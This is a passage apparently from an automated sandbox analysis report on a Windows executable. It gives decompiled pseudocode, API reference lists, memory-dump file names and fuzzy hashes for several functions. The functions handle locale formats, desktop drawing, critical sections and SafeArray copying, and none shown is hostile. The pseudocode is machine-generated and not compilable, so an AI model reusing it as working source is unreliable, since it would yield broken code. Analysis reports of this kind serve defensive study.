					E00428730( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E00428714( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}

0x00446967
0x0044696a
0x0044696c
0x00446971
0x00446aee
0x00446aee
0x00446af3
0x00446b00
0x00446b00
0x0044697b
0x00446985
0x0044697d
0x0044697d
0x0044697d
0x0044698e
0x004469a2
0x00446990
0x0044699e
0x0044699e
0x004469a8
0x004469c1
0x004469aa
0x004469b8
0x004469b8
0x004469c8
0x00446a02
0x00446a05
0x004469d0
0x004469d3
0x004469f7
0x004469fc
0x004469d5
0x004469e6
0x004469e8
0x004469e8
0x004469d3
0x00446a0c
0x00446a11
0x00446a55
0x00446a19
0x00446a21
0x00446a4c
0x00446a23
0x00446a38
0x00446a38
0x00446a21
0x00446a6d
0x00446a7b
0x00446a83
0x00446a96
0x00446a96
0x00446aa4
0x00446aac
0x00446abf
0x00446abf
0x00446ac9
0x00446ae9
0x00446ae9
0x00000000

APIs

MulDiv.KERNEL32 ref: 00446999
MulDiv.KERNEL32 ref: 004469B3
MulDiv.KERNEL32 ref: 004469E1
MulDiv.KERNEL32 ref: 004469F7
MulDiv.KERNEL32 ref: 00446A2F
MulDiv.KERNEL32 ref: 00446A47
MulDiv.KERNEL32 ref: 00446A91
MulDiv.KERNEL32 ref: 00446ABA
MulDiv.KERNEL32 ref: 00446AE0

Part of subcall function 00428730: MulDiv.KERNEL32 ref: 0042873D

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92202b19f1365d19918ce5d45f64d1343273fd33ec9b2b21f99fd722066f77f3
Instruction ID: a7af99fdf132f76144e98508861555a1ecf8b8a12daa4f0965542776ccba9f2e
Opcode Fuzzy Hash: 92202b19f1365d19918ce5d45f64d1343273fd33ec9b2b21f99fd722066f77f3
Instruction Fuzzy Hash: 18513DB0208740AFE320DF69C841B6BB7E9AF47304F05881EB9D6D7352D639EC448B1A

Uniqueness

Uniqueness Score: -1.00%

Function 00447844, Relevance: 13.6, APIs: 9, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00447844(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HWND__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				int _t76;
				intOrPtr _t82;
				int _t85;
				void* _t90;
				int _t91;
				void* _t94;
				void* _t95;
				intOrPtr _t96;

				_t94 = _t95;
				_t96 = _t95 + 0xffffffe0;
				_v5 = __ecx;
				_t76 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t90);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t90);
				}
				_v12 = GetDesktopWindow();
				_v16 = GetDCEx(_v12, 0, 0x402);
				_push(_t94);
				_push(0x44795f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t96;
				_v20 = SelectObject(_v16, E00428C98( *((intOrPtr*)(_t90 + 0x40))));
				_t91 = _v36;
				_t85 = _v32;
				PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049);
				PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, 0x5a0049);
				PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049);
				PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(0x447966);
				return ReleaseDC(_v12, _v16);
			}

0x00447845
0x00447847
0x0044784d
0x00447859
0x0044785f
0x0044786f
0x00447876
0x00447877
0x00447878
0x00447879
0x0044787a
0x00447861
0x00447861
0x00447868
0x00447869
0x0044786a
0x0044786b
0x0044786c
0x0044786c
0x00447880
0x00447893
0x00447898
0x00447899
0x0044789e
0x004478a1
0x004478b6
0x004478c2
0x004478ca
0x004478d7
0x004478f9
0x00447918
0x00447932
0x0044793f
0x00447946
0x00447949
0x0044794c
0x0044795e

APIs

GetDesktopWindow.USER32 ref: 0044787B
GetDCEx.USER32 ref: 0044788E
SelectObject.GDI32(?,00000000), ref: 004478B1
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004478D7
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 004478F9
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 00447918
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 00447932
SelectObject.GDI32(?,?), ref: 0044793F
ReleaseDC.USER32(?,?), ref: 00447959

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$DesktopReleaseWindow
String ID:
API String ID: 1187665388-0
Opcode ID: 73d2d2713da67a8e4f16186487b6fb5140cbc0002e4e46d294e763d739c48c77
Instruction ID: 052d6a264ad795e68cc8814362e554f8ce98474a4756b9ffa59b8818ee78a9f9
Opcode Fuzzy Hash: 73d2d2713da67a8e4f16186487b6fb5140cbc0002e4e46d294e763d739c48c77
Instruction Fuzzy Hash: E3310CB6E04219AFDB00DEEDCC89DAFBBBCEF49704B014569B514F7241C679AD048BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC84, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040DC84(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40df4f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040DB0C();
				E0040C384(__ebx, __edi, __esi);
				_t196 =  *0x4bc750;
				if( *0x4bc750 != 0) {
					E0040C55C(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0040C2D4(_t43, 0, 0x14,  &_v20);
				E0040442C(0x4bc684, _v20);
				E0040C2D4(_t43, 0x40df64, 0x1b,  &_v24);
				 *0x4bc688 = E00408EF0(0x40df64, 0, _t196);
				E0040C2D4(_t132, 0x40df64, 0x1c,  &_v28);
				 *0x4bc689 = E00408EF0(0x40df64, 0, _t196);
				 *0x4bc68a = E0040C320(_t132, 0x2c, 0xf);
				 *0x4bc68b = E0040C320(_t132, 0x2e, 0xe);
				E0040C2D4(_t132, 0x40df64, 0x19,  &_v32);
				 *0x4bc68c = E00408EF0(0x40df64, 0, _t196);
				 *0x4bc68d = E0040C320(_t132, 0x2f, 0x1d);
				E0040C2D4(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040C60C(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E0040442C(0x4bc690, _v36);
				E0040C2D4(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040C60C(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E0040442C(0x4bc694, _v44);
				 *0x4bc698 = E0040C320(_t132, 0x3a, 0x1e);
				E0040C2D4(_t132, 0x40df98, 0x28,  &_v52);
				E0040442C(0x4bc69c, _v52);
				E0040C2D4(_t132, 0x40dfa4, 0x29,  &_v56);
				E0040442C(0x4bc6a0, _v56);
				E004043D8( &_v12);
				E004043D8( &_v16);
				E0040C2D4(_t132, 0x40df64, 0x25,  &_v60);
				_t104 = E00408EF0(0x40df64, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00404470( &_v8, 0x40dfbc);
				} else {
					E00404470( &_v8, 0x40dfb0);
				}
				E0040C2D4(_t132, 0x40df64, 0x23,  &_v64);
				_t111 = E00408EF0(0x40df64, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0040C2D4(_t132, 0x40df64, 0x1005,  &_v68);
					if(E00408EF0(0x40df64, 0, _t198) != 0) {
						E00404470( &_v12, 0x40dfd8);
					} else {
						E00404470( &_v16, 0x40dfc8);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404758();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404758();
				 *0x4bc752 = E0040C320(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040DF56);
				return E004043FC( &_v68, 0x10);
			}

0x0040dc84
0x0040dc84
0x0040dc85
0x0040dc87
0x0040dc8c
0x0040dc8c
0x0040dc8e
0x0040dc90
0x0040dc90
0x0040dc93
0x0040dc96
0x0040dc97
0x0040dc9c
0x0040dc9f
0x0040dca2
0x0040dca7
0x0040dcac
0x0040dcb3
0x0040dcb5
0x0040dcb5
0x0040dcbf
0x0040dcce
0x0040dcdb
0x0040dcf0
0x0040dcff
0x0040dd14
0x0040dd23
0x0040dd36
0x0040dd49
0x0040dd5e
0x0040dd6d
0x0040dd80
0x0040dd95
0x0040dda0
0x0040ddad
0x0040ddc2
0x0040ddcd
0x0040ddda
0x0040dded
0x0040de02
0x0040de0f
0x0040de24
0x0040de31
0x0040de39
0x0040de41
0x0040de56
0x0040de60
0x0040de65
0x0040de67
0x0040de80
0x0040de69
0x0040de71
0x0040de71
0x0040de95
0x0040de9f
0x0040dea4
0x0040dea6
0x0040deb8
0x0040dec9
0x0040dee2
0x0040decb
0x0040ded3
0x0040ded3
0x0040dec9
0x0040dee7
0x0040deea
0x0040deed
0x0040def2
0x0040deff
0x0040df04
0x0040df07
0x0040df0a
0x0040df0f
0x0040df1c
0x0040df2f
0x0040df36
0x0040df39
0x0040df3c
0x0040df4e

APIs

GetThreadLocale.KERNEL32(00000000,0040DF4F,?,?,00000000,00000000), ref: 0040DCBA

Part of subcall function 0040C2D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C2F2

Strings

AMPM, xrefs: 0040DECE
AMPM , xrefs: 0040DEDD
mmmm d, yyyy, xrefs: 0040DDB6
:mm:ss, xrefs: 0040DF0A
:mm, xrefs: 0040DEED
m/d/yy, xrefs: 0040DD89

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: e8c9d774b8b2df05bcb252d0bf76ea733982fb600d781e0ddc32bfc1c4268f7e
Instruction ID: fe3088db23ddf9f2fe55ec598fc93550c623c21a3c6a9f23a321fd8cfddd8580
Opcode Fuzzy Hash: e8c9d774b8b2df05bcb252d0bf76ea733982fb600d781e0ddc32bfc1c4268f7e
Instruction Fuzzy Hash: 7E616A70B002499BDB00FBF5D8C1A9E73A69B98304F50E13BB501BB6C6CA3CD909976D

Uniqueness

Uniqueness Score: -1.00%

Function 00416F20, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00416F20(void* __ebx, signed int __ecx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v9;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char* _v48;
				char _v52;
				signed int _v56;
				char _v60;
				char _v64;
				char _v320;
				char _v324;
				intOrPtr _t57;
				intOrPtr* _t61;
				intOrPtr _t65;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr* _t76;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr* _t89;
				intOrPtr _t93;
				intOrPtr _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				signed int _t114;
				signed int _t115;
				char _t123;
				intOrPtr _t129;
				signed int _t138;
				intOrPtr _t145;
				void* _t147;
				void* _t148;
				intOrPtr _t149;
				void* _t160;

				_t144 = __esi;
				_t141 = __edi;
				_t123 = __edx;
				_t115 = __ecx;
				_t147 = _t148;
				_t149 = _t148 + 0xfffffec0;
				_push(__esi);
				_push(__edi);
				_v324 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				if(__edx != 0) {
					_t149 = _t149 + 0xfffffff0;
					_t57 = E00403984(_t57, _t147);
				}
				_v12 = _t115;
				_v9 = _t123;
				_v8 = _t57;
				_push(_t147);
				_push(0x41717d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t149;
				E004035DC(0);
				_push(0x4bc828);
				L00406AC4();
				_t116 = 0;
				_push(_t147);
				_push(0x417150);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t149;
				_t114 = (_v12 & 0x0000ffff) - 0x100;
				if(_t114 < 0 || _v12 < 0x10f) {
					_t61 =  *0x4bb1b0; // 0x4a012c
					_v28 =  *_t61;
					_v24 = 0xb;
					_v20 = _v12 & 0x0000ffff;
					_v16 = 0;
					_t65 =  *0x4bae98; // 0x40795c
					E0040656C(_t65, _t116,  &_v32);
					_t116 = _v32;
					E0040CB00(_t114, _v32, 1, _t141, _t144, 1,  &_v28);
					E00403DEC();
				}
				_t69 =  *0x4bc824; // 0x1c41ebc
				_t145 = E0040564C(_t69);
				if(_t145 <= _t114) {
					asm("cdq");
					_t141 = (_t114 / 0xf + 1 << 4) - _t114 / 0xf + 1;
					if(_t141 > 0x7ff) {
						_t107 =  *0x4badc8; // 0x407974
						E0040656C(_t107, 0xf,  &_v36);
						E0040CAC4(_v36, 1);
						E00403DEC();
					}
					_push(_t141);
					_t116 = 1;
					E00405828();
					_t102 =  *0x4bc824; // 0x1c41ebc
					_t103 = E0040564C(_t102);
					_t138 = _t145;
					_t105 = _t103 - 1 - _t138;
					if(_t105 >= 0) {
						_t106 = _t105 + 1;
						do {
							_t116 =  *0x4bc824; // 0x1c41ebc
							_t145 = 0;
							 *((intOrPtr*)(_t116 + _t138 * 4)) = 0;
							_t138 = _t138 + 1;
							_t106 = _t106 - 1;
						} while (_t106 != 0);
					}
				}
				_t71 =  *0x4bc824; // 0x1c41ebc
				_t72 =  *((intOrPtr*)(_t71 + _t114 * 4));
				if(_t72 != 0) {
					_t160 = _t72 -  *0x4a0474; // 0xffffffff
					if(_t160 != 0) {
						_t76 =  *0x4bb1b0; // 0x4a012c
						_v64 =  *_t76;
						_v60 = 0xb;
						_v56 = _v12 & 0x0000ffff;
						_v52 = 0;
						_t79 =  *0x4bc824; // 0x1c41ebc
						E0040355C( *((intOrPtr*)( *((intOrPtr*)(_t79 + _t114 * 4)))),  &_v320);
						_v48 =  &_v320;
						_v44 = 4;
						_t85 =  *0x4bad10; // 0x407964
						E0040656C(_t85, _t116,  &_v324);
						E0040CB00(_t114, _v324, 1, _t141, _t145, 2,  &_v64);
						E00403DEC();
					} else {
						_t89 =  *0x4bb1b0; // 0x4a012c
						_v28 =  *_t89;
						_v24 = 0xb;
						_v20 = _v12 & 0x0000ffff;
						_v16 = 0;
						_t93 =  *0x4baf38; // 0x40796c
						E0040656C(_t93, _t116,  &_v40);
						E0040CB00(_t114, _v40, 1, _t141, _t145, 1,  &_v28);
						E00403DEC();
					}
				}
				_t73 =  *0x4bc824; // 0x1c41ebc
				 *((intOrPtr*)(_t73 + _t114 * 4)) = _v8;
				 *((short*)(_v8 + 4)) = _v12;
				_pop(_t129);
				 *[fs:eax] = _t129;
				_push(E00417157);
				_push(0x4bc828);
				L00406C2C();
				return 0;
			}

0x00416f20
0x00416f20
0x00416f20
0x00416f20
0x00416f21
0x00416f23
0x00416f2a
0x00416f2b
0x00416f2e
0x00416f34
0x00416f37
0x00416f3a
0x00416f3f
0x00416f41
0x00416f44
0x00416f44
0x00416f49
0x00416f4d
0x00416f50
0x00416f55
0x00416f56
0x00416f5b
0x00416f5e
0x00416f66
0x00416f6b
0x00416f70
0x00416f75
0x00416f77
0x00416f78
0x00416f7d
0x00416f80
0x00416f87
0x00416f8f
0x00416f99
0x00416fa0
0x00416fa3
0x00416fab
0x00416fae
0x00416fbb
0x00416fc0
0x00416fc5
0x00416fcf
0x00416fd4
0x00416fd4
0x00416fd9
0x00416fe3
0x00416fe7
0x00416ff0
0x00416ff9
0x00417001
0x00417006
0x0041700b
0x0041701a
0x0041701f
0x0041701f
0x00417024
0x0041702a
0x00417035
0x00417040
0x00417045
0x0041704b
0x0041704c
0x0041704e
0x00417050
0x00417051
0x00417051
0x00417057
0x00417059
0x0041705c
0x0041705d
0x0041705d
0x00417051
0x0041704e
0x00417060
0x00417065
0x0041706a
0x00417070
0x00417076
0x004170ba
0x004170c1
0x004170c4
0x004170cc
0x004170cf
0x004170d3
0x004170e3
0x004170ee
0x004170f1
0x00417101
0x00417106
0x00417118
0x0041711d
0x00417078
0x00417078
0x0041707f
0x00417082
0x0041708a
0x0041708d
0x0041709a
0x0041709f
0x004170ae
0x004170b3
0x004170b3
0x00417076
0x00417122
0x0041712a
0x00417134
0x0041713a
0x0041713d
0x00417140
0x00417145
0x0041714a
0x0041714f

APIs

RtlEnterCriticalSection.KERNEL32(004BC828,00000000,0041717D), ref: 00416F70

Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E

RtlLeaveCriticalSection.KERNEL32(004BC828,00417157,00417150,?,004BC828,00000000,0041717D), ref: 0041714A

Strings

ty@, xrefs: 00417006
\y@, xrefs: 00416FBB
dy@, xrefs: 00417101
ly@, xrefs: 0041709A
DmA, xrefs: 0041702F

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeaveLoadString
String ID: DmA$\y@$dy@$ly@$ty@
API String ID: 2800025304-3753360372
Opcode ID: 7744faa271088df62b5dcf0486099282ee15f47e64ba6f0acf8cd78b662ba490
Instruction ID: dfba0e48724b562cef64671c5921ead9b711b7a838850d76f9f14f94c4d6bf22
Opcode Fuzzy Hash: 7744faa271088df62b5dcf0486099282ee15f47e64ba6f0acf8cd78b662ba490
Instruction Fuzzy Hash: 7D615F70A002089FCB10EF69D8C1AEDBBF5EB49704F14417AE944A73A1D779AD40CF69

Uniqueness

Uniqueness Score: -1.00%

Function 004107D0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E004107D0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				intOrPtr _v792;
				signed short* _v796;
				char _v800;
				char _v804;
				intOrPtr* _v808;
				void* __ebp;
				signed char _t51;
				signed int _t58;
				void* _t66;
				intOrPtr* _t78;
				intOrPtr* _t96;
				void* _t98;
				void* _t100;
				void* _t103;
				void* _t104;
				intOrPtr* _t114;
				void* _t118;
				char* _t119;
				void* _t120;

				_t105 = __ecx;
				_v780 = __ecx;
				_t96 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E00410378(0x80070057);
				}
				_t51 =  *_t96;
				if((_t51 & 0x00000fff) != 0xc) {
					_push(_t96);
					_push(_v776);
					L0040EEC8();
					return E00410378(_v776);
				} else {
					if((_t51 & 0x00000040) == 0) {
						_v796 =  *((intOrPtr*)(_t96 + 8));
					} else {
						_v796 =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 8))));
					}
					_v788 =  *_v796 & 0x0000ffff;
					_t98 = _v788 - 1;
					if(_t98 < 0) {
						L9:
						_push( &_v772);
						_t58 = _v788;
						_push(_t58);
						_push(0xc);
						L0040F324();
						_v792 = _t58;
						if(_v792 == 0) {
							E004100D0(_t105);
						}
						E00410728(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _v792;
						_t100 = _v788 - 1;
						if(_t100 < 0) {
							L14:
							_t102 = _v788 - 1;
							if(E00410744(_v788 - 1, _t120) != 0) {
								L0040F35C();
								E00410378(_v796);
								L0040F35C();
								E00410378(_v792);
								_v780(_v792,  &_v260,  &_v804, _v796,  &_v260,  &_v800);
							}
							_t66 = E00410774(_t102, _t120);
						} else {
							_t103 = _t100 + 1;
							_t78 =  &_v768;
							_t114 =  &_v260;
							do {
								 *_t114 =  *_t78;
								_t114 = _t114 + 4;
								_t78 = _t78 + 8;
								_t103 = _t103 - 1;
							} while (_t103 != 0);
							do {
								goto L14;
							} while (_t66 != 0);
							return _t66;
						}
					} else {
						_t104 = _t98 + 1;
						_t118 = 0;
						_t119 =  &_v772;
						do {
							_v808 = _t119;
							_push(_v808 + 4);
							_t18 = _t118 + 1; // 0x1
							_push(_v796);
							L0040F32C();
							E00410378(_v796);
							_push( &_v784);
							_t21 = _t118 + 1; // 0x1
							_push(_v796);
							L0040F334();
							E00410378(_v796);
							 *_v808 = _v784 -  *((intOrPtr*)(_v808 + 4)) + 1;
							_t118 = _t118 + 1;
							_t119 = _t119 + 8;
							_t104 = _t104 - 1;
						} while (_t104 != 0);
						goto L9;
					}
				}
			}

0x004107d0
0x004107dc
0x004107e2
0x004107e4
0x004107ee
0x004107f5
0x004107f5
0x004107fa
0x00410808
0x00410996
0x0041099d
0x0041099e
0x00000000
0x0041080e
0x00410811
0x00410823
0x00410813
0x00410818
0x00410818
0x00410832
0x0041083e
0x00410841
0x004108ae
0x004108b4
0x004108b5
0x004108bb
0x004108bc
0x004108be
0x004108c3
0x004108d0
0x004108d2
0x004108d2
0x004108dd
0x004108e8
0x004108f9
0x00410902
0x00410905
0x00410921
0x00410928
0x00410933
0x0041094a
0x0041094f
0x00410969
0x0041096e
0x00410981
0x00410981
0x0041098a
0x00410907
0x00410907
0x00410908
0x0041090e
0x00410914
0x00410916
0x00410918
0x0041091b
0x0041091e
0x0041091e
0x00410921
0x00000000
0x00000000
0x00000000
0x00410921
0x00410843
0x00410843
0x00410844
0x00410846
0x0041084c
0x0041084e
0x0041085d
0x0041085e
0x00410868
0x00410869
0x0041086e
0x00410879
0x0041087a
0x00410884
0x00410885
0x0041088a
0x004108a5
0x004108a7
0x004108a8
0x004108ab
0x004108ab
0x00000000
0x0041084c
0x00410841

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410869
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410885
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 004108BE
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0041094A
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410969
VariantCopy.OLEAUT32(?), ref: 0041099E

Strings

, xrefs: 004107EA

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-3916222277
Opcode ID: fbf0aca35e5e79794d881292854d23dfe8fd71cc01930bb9e2c050051ee0aef9
Instruction ID: e28228e0896c1e5e64a5986b68fafb10ea955b9b6fe76349267b1c3d6d9b6922
Opcode Fuzzy Hash: fbf0aca35e5e79794d881292854d23dfe8fd71cc01930bb9e2c050051ee0aef9
Instruction Fuzzy Hash: 6851EC7590021D9BCB61EB59C891BD9B3FCAF4C314F4041EAE508E7252D674AFC58F68

Uniqueness

Uniqueness Score: -1.00%

Function 0046759C, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 004675AF
GetWindowRect.USER32 ref: 00467609
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 00467641
MessageBoxA.USER32 ref: 00467682
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 004676D2
SetActiveWindow.USER32(?), ref: 004676E3

Strings

(, xrefs: 004675E6

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Active$MessageRect
String ID: (
API String ID: 3147912190-3887548279
Opcode ID: 13bd67af783d30af5c9173b1492e2fcf31705a082cfa829788fcd296847459b1
Instruction ID: 193e5c1017d00ba57c58a2faf3713903dc5bc01be3baf6e39d3ee82a262e33c8
Opcode Fuzzy Hash: 13bd67af783d30af5c9173b1492e2fcf31705a082cfa829788fcd296847459b1
Instruction Fuzzy Hash: 07413C75E04108AFDB04DBA9CD85FAE77F9EB48304F14446AF904E7391D678AD008B55

Uniqueness

Uniqueness Score: -1.00%

Function 0042BCD8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0042BCD8(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				char* _t110;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E0042BB74(__eax);
				_t110 =  &_v38;
				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E0042A63C( &_v38) != _v18) {
					E004297CC();
				}
				_v12 = _v12 - 0x16;
				_v16 = E00402AE4(_v12, 0x16, _t110);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x42be47, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
